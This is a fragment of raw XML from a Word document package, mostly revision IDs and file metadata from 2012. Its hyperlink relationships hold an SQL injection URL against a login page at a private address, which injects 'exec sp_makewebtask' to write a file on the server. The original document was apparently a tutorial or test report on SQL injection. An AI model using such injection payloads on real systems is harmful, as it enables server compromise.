    <w:rsid w:val="00CF54EA"/>
    <w:rsid w:val="00CF729F"/>
    <w:rsid w:val="00D02BEE"/>
    <w:rsid w:val="00D04529"/>
    <w:rsid w:val="00D04A18"/>
    <w:rsid w:val="00D10CEE"/>
    <w:rsid w:val="00D218AB"/>
    <w:rsid w:val="00D33B2A"/>
    <w:rsid w:val="00D502F0"/>
    <w:rsid w:val="00D601AC"/>
    <w:rsid w:val="00D72953"/>
    <w:rsid w:val="00D81F27"/>
    <w:rsid w:val="00D86145"/>
    <w:rsid w:val="00DA19FE"/>
    <w:rsid w:val="00DB4197"/>
    <w:rsid w:val="00DB4666"/>
    <w:rsid w:val="00DC4DC8"/>
    <w:rsid w:val="00E11E60"/>
    <w:rsid w:val="00E21825"/>
    <w:rsid w:val="00E22624"/>
    <w:rsid w:val="00E322C9"/>
    <w:rsid w:val="00E5054B"/>
    <w:rsid w:val="00E51631"/>
    <w:rsid w:val="00E70C8B"/>
    <w:rsid w:val="00E80D67"/>
    <w:rsid w:val="00E93E19"/>
    <w:rsid w:val="00E97481"/>
    <w:rsid w:val="00EA3A99"/>
    <w:rsid w:val="00EA6163"/>
    <w:rsid w:val="00ED3EE9"/>
    <w:rsid w:val="00EE720D"/>
    <w:rsid w:val="00F14B78"/>
    <w:rsid w:val="00F4619C"/>
    <w:rsid w:val="00F5212F"/>
    <w:rsid w:val="00F75363"/>
    <w:rsid w:val="00F86F21"/>
    <w:rsid w:val="00F9795A"/>
    <w:rsid w:val="00FC1947"/>
    <w:rsid w:val="00FD04E2"/>
    <w:rsid w:val="00FF1082"/>
    <w:rsid w:val="00FF1877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79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179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79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17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dblogin123.asp?username=123';exec%20sp_makewebtask%20'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5/display.asp?keyno=18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/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.5/display.asp?keyno=1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5551</Words>
  <Characters>31641</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>263</Lines>
  <Paragraphs>74</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>inspur</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>37118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weidaotong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>weidaotong</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-26T02:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-26T02:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>